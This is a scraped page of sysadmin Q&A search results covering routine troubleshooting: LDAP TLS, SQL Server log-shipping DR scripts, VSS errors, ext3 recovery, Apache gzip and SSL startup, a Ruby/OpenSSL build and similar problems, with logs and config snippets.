Search Results

Search found 23044 results on 922 pages for 'oracle solaris 11'.


  • Query Execution Failed in Reporting Services reports

    - by Chris Herring
    I have some reporting services reports that talk to Analysis Services and at times they fail with the following error:

      An error occurred during client rendering.
      An error has occurred during report processing.
      Query execution failed for dataset 'AccountManagerAccountManager'.
      The connection cannot be used while an XmlReader object is open.

    This occurs sometimes when I change selections in the filter. It also occurs when the machine has been under heavy load and then will consistently error until SSAS is restarted. The log file contains the following error:

      processing!ReportServer_0-18!738!04/06/2010-11:01:14:: e ERROR: Throwing Microsoft.ReportingServices.ReportProcessing.ReportProcessingException: Query execution failed for dataset 'AccountManagerAccountManager'., ;
      Info: Microsoft.ReportingServices.ReportProcessing.ReportProcessingException: Query execution failed for dataset 'AccountManagerAccountManager'.
      ---> System.InvalidOperationException: The connection cannot be used while an XmlReader object is open.
        at Microsoft.AnalysisServices.AdomdClient.XmlaClient.CheckConnection()
        at Microsoft.AnalysisServices.AdomdClient.XmlaClient.ExecuteStatement(String statement, IDictionary connectionProperties, IDictionary commandProperties, IDataParameterCollection parameters, Boolean isMdx)
        at Microsoft.AnalysisServices.AdomdClient.AdomdConnection.XmlaClientProvider.Microsoft.AnalysisServices.AdomdClient.IExecuteProvider.ExecuteTabular(CommandBehavior behavior, ICommandContentProvider contentProvider, AdomdPropertyCollection commandProperties, IDataParameterCollection parameters)
        at Microsoft.AnalysisServices.AdomdClient.AdomdCommand.ExecuteReader(CommandBehavior behavior)
        at Microsoft.AnalysisServices.AdomdClient.AdomdCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior)
        at Microsoft.ReportingServices.DataExtensions.AdoMdCommand.ExecuteReader(CommandBehavior behavior)
        at Microsoft.ReportingServices.OnDemandProcessing.RuntimeDataSet.RunDataSetQuery()

    Can anyone shed light on this issue?


  • ASP.NET AJAX, WebSeal Junctions, and Sessions

    - by powella
    I've run up against a problem with ASP.NET AJAX (hooked up to WebServices directly) when accessing our site through a WebSEAL junction. Listing 11 on this page, http://www.ibm.com/developerworks/tivoli/library/t-ajaxtam/index.html, explains that requests which do not result in a content type of text/html are not sent with cookie data. Hence, no session. ASP.NET AJAX requests are returned with a content type of "application/json; charset=utf-8". As such, the WebSEAL junction is not appending the session cookie to the request. This results in our WebService seeing the user as invalid, due to no session information. The junction has been set up properly with the -J parameter (that's an uppercase J, which appends the required script for WebSEAL to the bottom of the page - this prevents forcing IE into quirks mode), and we've confirmed that the necessary script exists in the output source. I'm up for any suggestions at this point, as I'm out of ideas. FWIW, the site runs perfectly when not accessed through the WebSEAL junction.


  • Ubuntu 12.04 LDAP SSL self-signed cert not accepted

    - by MaddHacker
    I'm working with Ubuntu 12.04, using an OpenLDAP server. I've followed the instructions on the Ubuntu help pages and can happily connect without security. To test my connection I'm using ldapsearch; the command looks like:

      ldapsearch -xv -H ldap://ldap.[my host].local -b dc=[my domain],dc=local -d8 -ZZ

    I've also used:

      ldapsearch -xv -H ldaps://ldap.[my host].local -b dc=[my domain],dc=local -d8

    As far as I can tell, I've set up my certificate correctly, but no matter what I try, I can't seem to get ldapsearch to accept my self-signed certificate. So far, I've tried:

      - Updating my /etc/ldap/ldap.conf file to look like:

          BASE         dc=[my domain],dc=local
          URI          ldaps://ldap.[my host].local
          TLS_CACERT   /etc/ssl/certs/cacert.crt
          TLS_REQCERT  allow

      - Updating my /etc/ldap.conf file to look like:

          base dc=[my domain],dc=local
          uri ldapi:///ldap.[my host].local
          uri ldaps:///ldap.[my host].local
          ldap_version 3
          ssl start_tls
          ssl on
          tls_checkpeer no
          TLS_REQCERT allow

      - Updating my /etc/default/slapd to include:

          SLAPD_SERVICES="ldap:/// ldapi:/// ldaps:///"

      - Several hours of Googling, most of which resulted in adding the TLS_REQCERT allow line.

    The exact error I'm seeing is:

      ldap_initialize( ldap://ldap.[my host].local )
      request done: ld 0x20038710 msgid 1
      TLS certificate verification: Error, self signed certificate in certificate chain
      TLS: can't connect.
      ldap_start_tls: Connect error (-11)
            additional info: error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed

    After several hours of this, I was hoping someone else has seen this issue and/or knows how to fix it. Please do let me know if I should add more information, or if you need further data.
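
    One way to narrow this down (a suggested diagnostic, not from the post): the error says the self-signed certificate in the chain is untrusted, which usually means the client never reads the CA certificate it is pointed at. A quick check, assuming the host and CA path from the question (the server certificate path below is hypothetical):

      # Inspect the chain the server actually presents on the ldaps port
      openssl s_client -connect ldap.[my host].local:636 -CAfile /etc/ssl/certs/cacert.crt < /dev/null
      # Verify the CA file really signs the server certificate
      openssl verify -CAfile /etc/ssl/certs/cacert.crt /etc/ldap/ssl/server.crt
      # Force ldapsearch to use the CA for a single run; if this works, the
      # TLS_CACERT line in /etc/ldap/ldap.conf isn't being picked up
      LDAPTLS_CACERT=/etc/ssl/certs/cacert.crt ldapsearch -xv -H ldaps://ldap.[my host].local -b dc=[my domain],dc=local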


  • Prosody mod_auth_external not working

    - by Yang
    I installed mod_auth_external for 0.8.2 on Ubuntu 12.04 but it's not working. I have

      external_auth_command = "/home/yang/chat/testing"

    but it's not getting invoked. I enabled debug logging and see no messages from that mod. Any help? I'm using the Candy example client. Here's what's written to the log after I submit a login request (and nothing in the err log):

      Oct 24 21:02:43 socket   debug  server.lua: accepted new client connection from 127.0.0.1:40527 to 5280
      Oct 24 21:02:43 mod_bosh debug  BOSH body open (sid: %s)
      Oct 24 21:02:43 boshb344ba85-fbf5-4a26-b5f5-5bd35d5ed372 debug BOSH session created for request from 169.254.11.255
      Oct 24 21:02:43 mod_bosh info   New BOSH session, assigned it sid 'b344ba85-fbf5-4a26-b5f5-5bd35d5ed372'
      Oct 24 21:02:43 httpserver debug Sending response to bf9120
      Oct 24 21:02:43 httpserver debug Destroying request bf9120
      Oct 24 21:02:43 httpserver debug Request has destroy callback
      Oct 24 21:02:43 socket   debug  server.lua: closed client handler and removed socket from list
      Oct 24 21:02:43 mod_bosh debug  Session b344ba85-fbf5-4a26-b5f5-5bd35d5ed372 has 0 out of 1 requests open
      Oct 24 21:02:43 mod_bosh debug  and there are 0 things in the send_buffer
      Oct 24 21:02:43 socket   debug  server.lua: accepted new client connection from 127.0.0.1:40528 to 5280
      Oct 24 21:02:43 mod_bosh debug  BOSH body open (sid: b344ba85-fbf5-4a26-b5f5-5bd35d5ed372)
      Oct 24 21:02:43 mod_bosh debug  Session b344ba85-fbf5-4a26-b5f5-5bd35d5ed372 has 1 out of 1 requests open
      Oct 24 21:02:43 mod_bosh debug  and there are 0 things in the send_buffer
      Oct 24 21:02:43 mod_bosh debug  Have nothing to say, so leaving request unanswered for now
      Oct 24 21:02:43 httpserver debug Request c295d0 left open, on_destroy is function(mod_bosh.lua:81)

    Here's the config I added:

      modules_enabled = {
          ...
          "bosh"; -- Enable BOSH clients, aka "Jabber over HTTP"
          ...
      }
      authentication = "external"
      external_auth_protocol = "generic"
      external_auth_command = "/home/yang/chat/testing"
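
    Two things worth checking, offered as suggestions rather than anything from the post: the command must be executable by the user prosody runs as, and with external_auth_protocol = "generic" the script is expected to read colon-separated requests (auth:user:host:password, isuser:user:host, ...) on stdin and answer 1 or 0 per line. A minimal test script under those assumptions:

      #!/bin/sh
      # /home/yang/chat/testing -- toy authenticator: approves everything (testing only!)
      while IFS= read -r line; do
        case "$line" in
          auth:*|isuser:*) echo 1 ;;   # accept any login / user-exists check
          *)               echo 0 ;;   # reject anything else (e.g. setpass)
        esac
      done

    and then:

      chmod +x /home/yang/chat/testing
      sudo -u prosody /home/yang/chat/testing   # confirm the prosody user can execute it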


  • Scripting an automated SQLServer 2008 DR move

    - by ItsAMystery
    Hi all. We use the built-in log shipping in SQL Server to log-ship to our DR site, but once a month we do a DR test, which requires us to move back and forth between our live and backup servers. We run multiple (30) databases on the system, so manually backing up the final logs and disabling the jobs is too much work and takes too long. I thought "no problem, I will script it", but I have run into trouble: it always complains that the final log backup is too early to apply, even though I don't export the final log until putting the database into norecovery mode.

    Firstly, does anyone know a simple and reliable way of doing this? I have looked at some 3rd party software (Redgate SQL Backup, I think it was) but that didn't make it easy in this situation either. What I want to be able to do is basically run a script (a series of stored procedures) to get me to DR, and run another to get me back with no data loss.

    My scripts are very simplistic at the moment, but here they are. There are 2 servers: primary PARIS, secondary PARIST. StartAgentJobAndWait is a script written by someone else (ta) which just checks that the jobs have finished, or quits them if they never end. At the moment I am just using a test database called BOB2, but if I can get it working I will pass in the database and job names.

    From PARIS:

      /* Disable backup job */
      exec msdb..sp_update_job @job_name = 'LSBackup_BOB2', @enabled = 0
      exec PARIST.msdb..sp_update_job @job_name = 'LSCopy_PARIS_BOB2', @enabled = 0
      exec PARIST.msdb..sp_update_job @job_name = 'LSRestore_PARIS_BOB2', @enabled = 0
      exec PARIST.master.dbo.DRStage2

    On PARIST, DRStage2:

      DECLARE @RetValue varchar (10)
      EXEC @RetValue = StartAgentJobAndWait LSCopy_PARIS_BOB2, 2
      SELECT ReturnValue = @RetValue
      if @RetValue = 1
      begin
        print 'The Copy Task completed successfully'
      END
      ELSE
        print 'The Copy task failed; this may or may not be a problem, check restore state of database'
      SELECT @RetValue = 0
      EXEC @RetValue = StartAgentJobAndWait LSRestore_PARIS_BOB2, 2
      SELECT ReturnValue = @RetValue
      if @RetValue = 1
      begin
        print 'The Restore Task completed successfully'
      END
      ELSE
        print 'The Restore task failed; this may or may not be a problem, check restore state of database'
      exec PARIS.master.dbo.DRStage3

    On PARIS, DRStage3 does the last log ship and moves it to Trumpington:

      BACKUP log "BOB2" to disk='c:\drlogshipping\BOB2.bak' with compression, norecovery
      EXEC xp_cmdshell 'copy c:\drlogshipping \\192.168.7.11\drlogshipping'
      EXEC PARIST.master.dbo.DRTransferFinish

    And on PARIST, DRTransferFinish:

      restore database "BOB2" from disk='c:\drlogshipping\bob2.bak' with recovery
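
    One ordering detail that commonly produces the "too early to apply" complaint (a hedged observation, not something from the post): the tail-log backup is only restorable after every earlier scheduled log backup has been copied and restored on the secondary, so the backup job must be disabled and the copy/restore jobs drained before the tail is taken. A rough sketch of that sequence with sqlcmd, reusing the server and path names from the scripts above:

      REM 1. Stop new log backups on the primary
      sqlcmd -S PARIS -Q "exec msdb..sp_update_job @job_name='LSBackup_BOB2', @enabled=0"
      REM 2. Run the copy and restore jobs once more so PARIST has every log so far
      REM 3. Take the tail-log backup, leaving the primary in a restoring state
      sqlcmd -S PARIS -Q "BACKUP LOG BOB2 TO DISK='c:\drlogshipping\BOB2_tail.bak' WITH NORECOVERY"
      REM 4. Apply the tail on the secondary and bring it online
      sqlcmd -S PARIST -Q "RESTORE LOG BOB2 FROM DISK='c:\drlogshipping\BOB2_tail.bak' WITH RECOVERY"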


  • Where can I find linux-kernel-headers-x.x.x.x for SUSE?

    - by Landy
    I'm installing VMware Workstation on a SLED 11 SP1 machine, and the installation is blocked by this error message:

      Kernel headers for version 2.6.32.27-0.2-default were not found. If you installed them in a non-default path you can specify the path below. Otherwise refer to your distribution's documentation for installation instructions and click Refresh to search again in default locations.

    The output of rpm -qa | grep kernel is:

      kernel-default-2.6.32.27-0.2.2
      kernel-default-base-2.6.32.27-0.2.2
      linux-kernel-headers-2.6.32-1.4.13
      kernel-default-extra-2.6.32.27-0.2.2
      nfs-kernel-server-1.2.1-2.10.1

    I ran into this issue in Ubuntu too; there I installed the required linux headers via apt-get and the issue disappeared. But in SLED I didn't find the rpm package in SUSE's software repository, and googling "linux-kernel-headers-2.6.32.27" did not match any documents. Any suggestion will be highly appreciated. Thanks.

    The output of zypper se kernel | grep kernel is:

      i | linux-kernel-headers | Linux Kernel Headers | package
        | linux-kernel-headers | Linux Kernel Headers | srcpackage
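
    For what it's worth, on SUSE the headers needed for building kernel modules usually come from the kernel devel/source packages matching the running kernel flavor, not from linux-kernel-headers (which provides the userspace glibc headers). A hedged sketch; the package names are an assumption based on SUSE packaging conventions, so verify them with zypper se first:

      # Check the running kernel version and flavor
      uname -r                              # e.g. 2.6.32.27-0.2-default
      # Install the matching devel package for the "default" flavor
      zypper install kernel-default-devel kernel-source
      # VMware's installer looks for headers under the kernel build symlink
      ls /lib/modules/$(uname -r)/build/include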


  • VSS Post Backup failures for Virtual Server 2005 R2 SP1 virtual machines

    - by califguy4christ
    We've been seeing strange errors with Volume Shadow Copy services on our Virtual Server 2005 R2 SP1 host. It appears to be failing on a strange mountpoint in the C:\WINDOWS\Temp\ folders, which I believe is used by VSS to mount a writeable image file. To summarize:

      - The Microsoft Virtual Server 2005 Writer continually goes into a failed retryable state
      - The Virtual Server log reports errors during the Post Backup phase
      - VSS reports errors backing up a mount point of unknown origins
      - The mount point causes NTFS and ftdisk errors

    The host is x86 Windows Server 2003 Standard, SP2. The virtual machine is the same. Both use basic disks.

    Here is the writer state:

      Writer name: 'Microsoft Virtual Server 2005 Writer'
      Writer Id: {76afb926-87ad-4a20-a50f-cdc69412ddfc}
      Writer Instance Id: {78df98e2-bf19-4804-890b-15865efef3bd}
      State: [11] Failed
      Last error: Retryable error

    From the Virtual Server log:

      Virtual Server - Vss Writer - Event ID 1035: The VSS writer for Virtual Server failed during the PostBackup phase. The guest shadow copies did not get exposed on the host machine, after mounting all the virtual hard disks of the virtual machine VMACHINE.

    From the Application log:

      VSS - None - Event ID 12290: Volume Shadow Copy Service warning: GetVolumeInformationW( \\?\Volume{fb84bae7-87f5-11dd-9832-001cc4961ca6}\,NULL,0, NULL,NULL,[0x00000000], , 260) == 0x0000045d. hr = 0x00000000.

    From the System log:

      Ntfs - Disk - Event ID 55: The file system structure on the disk is corrupt and unusable. Please run the chkdsk utility on the volume C:\WINDOWS\Temp\ {fb84bae7-87f5-11dd-9832-001cc49....

    My current theory is that VSS creates a mount point for an image file of the VHD, then the software panics for some reason, leaving everything in an inconsistent state. Removing the mount point doesn't resolve the problem. All of the other disks check out fine with CHKDSK. There's no exclusion option for VHDs or to turn off online backups. Has anyone seen this kind of thing before, or can you point me in the right direction for getting more information about the mount point and its origins? I haven't been able to trace what application is creating that mount point.


  • gzip specific files

    - by byTheDrop
    For some reason these files are not gzipping on my Apache server; Chrome's network tab shows this. Is there a specific directive I can add to .htaccess to compress these files?

      Compressing the following resources with gzip could reduce their transfer size by about two thirds (~680.45KB):
        adae8bc4c3cb52cbe22358aaced87a72.css could save ~607B
        css_f91fa8d73b5e7661d6dcf9e58395e533.css could save ~59.54KB
        jquery.min.js could save ~37.27KB
        drupal.js could save ~6.15KB
        auto_image_handling.js could save ~6.72KB
        lightbox.js could save ~29.38KB
        superfish.js could save ~2.42KB
        jquery.bgiframe.min.js could save ~1011B
        jquery.hoverIntent.minified.js could save ~1.05KB
        nice_menus.js could save ~581B
        panels.js could save ~531B
        jquery.pngFix.js could save ~2.98KB
        jquery.cycle.all.min.js could save ~20.20KB
        views_slideshow.js could save ~8.76KB
        views_slideshow.js could save ~9.02KB
        wanderlust_custom_videos.js could save ~598B
        wl_helper.js could save ~777B
        extlink.js could save ~2.88KB
        cufon-yui.js could save ~11.89KB
        googleanalytics.js could save ~1.48KB
        swfobject.js could save ~6.65KB
        jquery.jcarousel.min.js could save ~10.19KB
        jcarousel.js could save ~6.01KB
        Akzidenz_Grotesk_BE_Super_800.font.js could save ~14.27KB
        Akzidenz_Grotesk_BE_Bold_700.font.js could save ~12.96KB
        Akzidenz_Grotesk_BE_Cn_400.font.js could save ~13.39KB
        SuperCondensed_500.font.js could save ~24.40KB
        FuturaBold_700.font.js could save ~26.19KB
        Futura_500.font.js could save ~57.70KB
        SuperGroteskB_500.font.js could save ~23.86KB
        jquery.cookie.js could save ~1.25KB
        wanderlust.js could save ~1.69KB
        sliderbottom.js could save ~442B
        jcarousellite_1.0.1.min.js could save ~4.60KB
        jcarousellite_control.js could save ~224B
        sitesdropdown.js could save ~1.09KB
        widgets.js could save ~50.13KB
        cufon-drupal.js could save ~599B
        swfobject_api.js could save ~348B
        ga.js could save ~24.02KB
        all.js could save ~124.67KB
        tweet_button.1347008535.html could save ~38.43KB
        xd_arbiter.php could save ~16.80KB
        xd_arbiter.php could save ~16.80KB
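
    For what it's worth, gzip compression in Apache is handled by mod_deflate rather than by a caching directive; a minimal .htaccess sketch, assuming mod_deflate is compiled in and enabled on the server:

      <IfModule mod_deflate.c>
        # Compress text-based assets; images and flash are skipped (already compressed)
        AddOutputFilterByType DEFLATE text/html text/plain text/css
        AddOutputFilterByType DEFLATE application/javascript application/x-javascript application/json
      </IfModule>

    Note that the third-party resources in the list (ga.js, widgets.js, xd_arbiter.php, ...) are served by other hosts, so they can't be compressed from this server's .htaccess.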


  • Ext3 fs: Block bitmap for group 1 not in group (block 0). Is the fs dead?

    - by ip
    Hi. My company has a server with one big partition holding a MySQL database and PHP files. Now this partition seems to be corrupted, as reported by kernel messages when I tried to mount it manually:

      [329862.817837] EXT3-fs error (device loop1): ext3_check_descriptors: Block bitmap for group 1 not in group (block 0)!
      [329862.817846] EXT3-fs: group descriptors corrupted!

    I've tried to recover it by running tools from a PLD live CD. These are the tools I have tested, without any success:

      - e2retrieve
      - testdisk
      - photorec
      - dd_rescue/dd_rhelp
      - ddrescue
      - fsck.ext2
      - e2salvage

    dumpe2fs reports:

      dumpe2fs 1.41.3 (12-Oct-2008)
      Filesystem volume name:   /dev/sda3
      Last mounted on:          <not available>
      Filesystem UUID:          dd51610b-6de0-4392-a6f3-67160dbc0343
      Filesystem magic number:  0xEF53
      Filesystem revision #:    1 (dynamic)
      Filesystem features:      has_journal filetype sparse_super
      Default mount options:    (none)
      Filesystem state:         not clean with errors
      Errors behavior:          Continue
      Filesystem OS type:       Linux
      Inode count:              9502720
      Block count:              18987570
      Reserved block count:     949378
      Free blocks:              11555345
      Free inodes:              11858398
      First block:              0
      Block size:               4096
      Fragment size:            4096
      Blocks per group:         32768
      Fragments per group:      32768
      Inodes per group:         16384
      Inode blocks per group:   512
      Last mount time:          Wed Mar 24 09:31:03 2010
      Last write time:          Mon Apr 12 11:46:32 2010
      Mount count:              10
      Maximum mount count:      30
      Last checked:             Thu Jan  1 01:00:00 1970
      Check interval:           0 (<none>)
      Reserved blocks uid:      0 (user root)
      Reserved blocks gid:      0 (group root)
      First inode:              11
      Inode size:               128
      Journal inode:            8
      Journal backup:           inode blocks
      dumpe2fs: A block group is missing an inode table while reading journal inode

    Are there any other tools I should try before considering this disk definitely unrecoverable? Many thanks, ip
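
    One avenue the list above doesn't mention (a suggestion, not from the post): ext3 keeps backup superblocks, each with its own copy of the group descriptor table, so e2fsck can sometimes repair corrupted descriptors from a backup. A sketch, assuming the 4096-byte block size reported by dumpe2fs, and working on an image rather than the disk itself:

      # Clone the partition first; never fsck the only copy
      ddrescue /dev/sda3 /mnt/backup/sda3.img /mnt/backup/sda3.log
      # List where the backup superblocks live for this geometry (-n prints, writes nothing)
      mke2fs -n -b 4096 /mnt/backup/sda3.img
      # Try fsck against a backup superblock, e.g. the one at block 32768
      e2fsck -b 32768 -B 4096 /mnt/backup/sda3.img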


  • Office Communicator and cannot sync Address book error

    - by Noah
    We are trying to get OCS 2007 R2 up and running. The clients log in fine, but when I let a client sit for a while, we still get the address book sync error message:

      Cannot synchronize with the corporate address book. This may be because the proxy server setting in your web browser does not allow access to the address book. If the problem persists, contact your system administrator.

    When I try to download the file locally, this error comes up:

      Could not load file or assembly 'ABServerHttpHandler, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. Failed to grant minimum permission requests. (Exception from HRESULT: 0x80131417)

    I googled and came across this post (http://social.technet.microsoft.com/Forums/en/ocsaddressbook/thread/c28ff2d8-66a4-456c-a5ad-e445a667e8ed) which suggests removing and reinstalling .NET 2.0, but that didn't seem to resolve the issue either. When we run abserver.exe -validateDB it works properly. We even tried the suggestion from Greg's Blog (http://blogs.technet.com/greganth/archive/2009/03/11/office-communicator-notifications-cannot-synchronize-address-book.aspx) about restarting the web component services, but that didn't work either. Still seeing the same issue. So does anyone have an idea of where we go from here?


  • Can't compile CentOS 5, Ruby 1.9.2 and OpenSSL 1.0.0c

    - by pstinnett
    I'm trying to install Ruby 1.9.2 on CentOS 5.5. I get through most of the make process, but when it tries to compile OpenSSL I get an error. Below is the error output:

      compiling openssl
      make[1]: Entering directory `/sources/ruby-1.9.2-p136/ext/openssl'
      gcc -I. -I../../.ext/include/x86_64-linux -I../.././include -I../.././ext/openssl -DRUBY_EXTCONF_H=\"extconf.h\" -fPIC -O3 -ggdb -Wextra -Wno-unused-parameter -Wno-parentheses -Wpointer-arith -Wwrite-strings -Wno-missing-field-initializers -Wno-long-long -o ossl_x509.o -c ossl_x509.c
      In file included from ossl.h:201,
                       from ossl_x509.c:11:
      openssl_missing.h:71: error: conflicting types for ‘HMAC_CTX_copy’
      /usr/include/openssl/hmac.h:102: error: previous declaration of ‘HMAC_CTX_copy’ was here
      openssl_missing.h:95: error: conflicting types for ‘EVP_CIPHER_CTX_copy’
      /usr/include/openssl/evp.h:459: error: previous declaration of ‘EVP_CIPHER_CTX_copy’ was here
      make[1]: *** [ossl_x509.o] Error 1
      make[1]: Leaving directory `/sources/ruby-1.9.2-p136/ext/openssl'
      make: *** [mkmain.sh] Error 1

    Any help would be greatly appreciated! I'm not a master at Linux by any means, but I was able to successfully install this version of Ruby on our dev server. Our live server is running a newer version of OpenSSL, which I'm assuming is why it's breaking. Just not sure what the fix is!
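
    The conflict is between Ruby's bundled compatibility declarations (openssl_missing.h) and the newer system OpenSSL headers. One approach, offered as a sketch rather than a verified fix: build Ruby explicitly against the OpenSSL installation you intend to use, so only one set of headers is in play (the prefix path here is hypothetical):

      cd /sources/ruby-1.9.2-p136
      ./configure --with-openssl-dir=/usr/local/openssl-1.0.0c
      make && make install
      # Confirm the extension built and loads
      ruby -ropenssl -e 'puts OpenSSL::OPENSSL_VERSION'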


  • How do I enable the confluence-users group?

    - by M. Joanis
    I've got an issue with Atlassian Confluence: normal users can't log in, but administrators can. Details below!

    I manage users using an Apple Open Directory (LDAP). I created two groups: "confluence-administrators" and "confluence-users". I've added team leaders and managers to both groups, and I've added some users to "confluence-users". Everyone in "confluence-administrators" can log in easily. People in "confluence-users" can't log in at all.

    When I look at the user list (in Confluence) and select a user to examine the list of groups he or she belongs to, I can see that the Confluence administrators are indeed members of the "confluence-administrators" group, but not a single user is a member of the "confluence-users" group. Not even the Confluence administrators, who are members of both groups!

    So I tried to have one of the "confluence-users" log in while watching the Confluence logs. Here's the result:

      2012-07-05 14:50:19,698 ERROR [http-8090-11] [core.event.listener.AutoGroupAdderListener] handleEvent Could not auto add user to group: Group <confluence-users> is read-only and cannot be updated
          at com.atlassian.crowd.directory.DbCachingRemoteDirectory.addUserToGroup(DbCachingRemoteDirectory.java:461)
          ...

    So it says the group is read-only. I'm not sure why that's a problem: "confluence-administrators" is read-only too, and it doesn't complain.

    Some things I don't think are part of the problem:

      - I've synchronized Confluence with LDAP many, many times.
      - I have verified many times that I didn't make a typo while setting the groups on the LDAP server.
      - LDAP synchronization goes well. No errors in the logs (only INFO level log messages).
      - The user exists. Errors in the logs are different when a user doesn't exist.

    Any help is most welcome!


  • What is causing random hard freezes on my system? Kaspersky?

    - by Christian Ivicevic
    Over the last few weeks I've experienced a new, strange behavior on my computer: sometimes Windows 7 just freezes for no real reason at all. While listening to music, for example, the playback hangs and you can hear a very nasty sound; neither mouse nor keyboard input is handled and everything is just stuck. Using Ubuntu this does not happen, so I think it is a matter of driver issues or a Windows 7 bug. Furthermore, I am really suspicious about Kaspersky (Internet Security 11), so I let it perform a complete virus scan while no other app was running. At about 50% it happened again, and I needed to restart the computer by holding the power button, the bad way... A really weird thing: playing Skyrim this happened once, but music playback did not stop; only the framerate dropped to 0, and sometimes for a few seconds I was able to move. I am all the more confused because no bluescreen pops up, and Memtest told me that everything seems to be alright... Can anyone tell me which data you need about my hardware and software (and which tools to use to gather that information) to be able to provide any help with my problem?


  • "Windows detected a hard drive" issue in Windows 7 x64

    - by Jasiu
    I upgraded to the OCZ-Agility3 120GB from a 60GB OCZ Vertex2 SSD. I cloned the drive from the Vertex to the new Agility. Everything seemed to have gone well and I have not had any problems. But in the past month I have been getting this error:

      [screenshot: "Windows detected a hard drive problem" warning]

    I downloaded the OCZToolboxMP and ran the SMART utility, and I don't see anything wrong:

      SMART READ DATA
      ModelNumber : OCZ-AGILITY3
      Serial Number : OCZ-Y1945X77438P4NU6
      WWN : 5-e8-3a-97 ebea5ba76
      Revision: 10
      Attributes List
      1:   SSD Raw Read Error Rate            Normalized Rate: 70 total ECC and RAISE errors
      5:   SSD Retired Block Count            Reserve blocks remaining: 100%
      9:   SSD Power-On Hours                 Total hours power on: 968
      12:  SSD Power Cycle Count              Count of power on/off cycles: 28
      171: SSD Program Fail Count             Total number of Flash program operation failures: 0
      172: SSD Erase Fail Count               Total number of Flash erase operation failures: 0
      174: SSD Unexpected power loss count    Total number of unexpected power loss: 11
      177: SSD Wear Range Delta               Delta between most-worn and least-worn Flash blocks: 0
      181: SSD Program Fail Count             Total number of Flash program operation failures: 0
      182: SSD Erase Fail Count               Total number of Flash erase operation failures: 0
      187: SSD Reported Uncorrectable Errors  Uncorrectable RAISE errors reported to the host for all data access: 4145
      194: SSD Temperature Monitoring         Current: 30 High: 30 Low: 30
      195: SSD ECC On-the-fly Count           Normalized Rate: 120
      196: SSD Reallocation Event Count       Total number of reallocated Flash blocks: 100
      201: SSD Uncorrectable Soft Read Error Rate   Normalized Rate: 120
      204: SSD Soft ECC Correction Rate (RAISE)     Normalized Rate: 120
      230: SSD Life Curve Status              Current state of drive operation based upon the Life Curve: 100
      231: SSD Life Left                      Approximate SSD life remaining: 100%
      241: SSD Lifetime writes from host      lifetime writes 893 GB
      242: SSD Lifetime reads from host       lifetime reads 968 GB

    Does anyone have any ideas of what might be wrong and/or how I can go about fixing it? Please let me know if there is other information I can provide. Thanks for your help.

      Windows 7 x64 SP1
      AMD Phenom II X4 940
      8GB RAM


  • iPod touch has extremely slow wifi, drops packets - only on my router

    - by mskfisher
    I just purchased an iPod Touch. I am having a lot of trouble with its speeds on my Tenda W311R, but it has no speed problems on my neighbor's Netgear router. It will connect and authenticate to my network, but the Speed Test app from speedtest.net shows rates near 20-50 kbps. If I run the speed test immediately after powering the iPod on, it will get speeds of 10-20 Mbps, like it should, but the speeds slow down to the kbps range about 10-15 seconds afterward. I get the same behavior with encryption and without encryption, and regardless of N, G, or B compatibility settings in the router. I've tried rebooting the iPod and resetting the network settings, but it's still slow. I've tried pinging the iPod from another computer, and it shows about 40% packet loss:

      $ ping 192.168.0.111
      PING 192.168.0.111 (192.168.0.111): 56 data bytes
      64 bytes from 192.168.0.111: icmp_seq=0 ttl=64 time=14.188 ms
      64 bytes from 192.168.0.111: icmp_seq=1 ttl=64 time=11.556 ms
      64 bytes from 192.168.0.111: icmp_seq=2 ttl=64 time=5.675 ms
      64 bytes from 192.168.0.111: icmp_seq=3 ttl=64 time=5.721 ms
      Request timeout for icmp_seq 4
      64 bytes from 192.168.0.111: icmp_seq=5 ttl=64 time=6.491 ms
      Request timeout for icmp_seq 6
      64 bytes from 192.168.0.111: icmp_seq=7 ttl=64 time=8.065 ms
      Request timeout for icmp_seq 8
      Request timeout for icmp_seq 9
      Request timeout for icmp_seq 10
      64 bytes from 192.168.0.111: icmp_seq=11 ttl=64 time=9.605 ms

    Signal strength is good - I'm never more than 20 feet from my access point, and it exhibits the same behavior if I'm standing next to the router. It works just well enough to receive text, but videos don't work at all. App downloads are hit and miss. I've tweaked just about all of the settings I can see to tweak, and I'm at a loss. I have also been searching Google for the past three days, all to no avail. Any suggestions?


  • Why doesn't Apache restart after configuring SSL?

    - by poz2k4444
    I've installed apache2 and then configured it to work with SSL following this and this tutorial. The problem comes when I try to restart the service; the following error is thrown:

      (98)Address already in use: make_sock: could not bind to address 0.0.0.0:443
      no listening sockets available, shutting down
      Unable to open logs

    The output of netstat -anp | grep 443 just displays Firefox listening and nothing else. How can I solve this and get the service running?

    The output of ps -Af | grep <firefox PID> is:

      root 1949    1 11 18:42 tty1 00:20:55 /opt/firefox/firefox-bin
      root 2025 1949  4 18:43 tty1 00:08:39 /opt/firefox/plugin-container /root/.mozilla/plugins/libflashplayer.so -greomni /opt/firefox/omni.ja 1949 true plugin

    After closing Firefox and then checking again for port 443, the output is:

      tcp   0  0 10.32.208.179:38923  74.125.139.155:443  TIME_WAIT  -
      tcp   0  0 10.32.208.179:45706  74.125.139.113:443  TIME_WAIT  -
      tcp   0  0 10.32.208.179:40456  74.125.139.156:443  TIME_WAIT  -
      tcp   0  0 10.32.208.179:56823  69.171.227.62:443   FIN_WAIT2  -
      unix  3  [ ] STREAM CONNECTED 12443 1721/dbus-daemon @/tmp/dbus-8ee35rmOOS

    Looking at the error logs (which are not from the time when I'm doing this), the last errors are:

      [Tue Oct 02 18:41:54 2012] [error] Init: Unable to read server certificate from file /etc/apache2/ssl/sever.crt
      [Tue Oct 02 18:41:54 2012] [error] SSL Library Error: 218529960 error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
      [Tue Oct 02 18:41:54 2012] [error] SSL Library Error: 218595386 error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error
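
    Two hedged observations based only on the output above: the netstat lines after closing Firefox are outbound HTTPS connections (remote port 443), not a local listener, so it is worth checking explicitly for whatever holds the port; and the "Unable to read server certificate" plus ASN.1 errors suggest the file at /etc/apache2/ssl/sever.crt (note the spelling) is missing or not in PEM format. A quick check:

      # Is anything actually LISTENing on 443? (root needed to see process names)
      sudo netstat -tlnp | grep ':443'
      # A duplicate "Listen 443" (ports.conf plus a vhost) also triggers make_sock errors
      grep -Rn 'Listen' /etc/apache2/ports.conf /etc/apache2/sites-enabled/
      # Verify the certificate file parses as PEM
      openssl x509 -in /etc/apache2/ssl/sever.crt -noout -text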


